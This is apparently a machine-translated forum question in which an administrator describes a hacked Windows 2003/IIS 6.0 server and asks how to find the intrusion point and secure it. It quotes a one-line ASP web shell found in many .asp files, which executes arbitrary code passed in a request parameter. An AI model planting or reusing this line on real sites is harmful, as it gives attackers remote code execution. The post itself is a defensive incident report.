Один из моих клиентов заметил сообщение в результатах поиска Google, в котором говорится, что их сайт, возможно, был взломан. После некоторого копания я нашел html-файлы на сервере, содержащие ссылки на мусор и javascript. Я удалил эти файлы, изменять пароли К, обновляются некоторые компоненты, такие как CKFinder и т.д ...Я думаю, что я был взломан и искал совет
тогда я начал искать в другие сайты на сервере и нашел тонну файлов .asp с этой линией
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
Я удалил их, но не знаю, как они туда попали. Я просмотрел различные журналы (просмотр событий, веб-сайт, ftp), но большинство из них не возвращаются достаточно далеко от того, когда были созданы файлы.
Я обновил ОС, который был всего лишь месяц или два устарел, и изменил доступ к ftp.
Что еще я могу сделать, чтобы найти точку входа или убедиться, что мой сервер и сайты в безопасности?
BTW: Это сервер Windows 2003 с IIS 6.0.
Windows 2003 является «только через месяц или два из даты»? – geoffspear
Ссылаясь на обновления Windows ... – SirM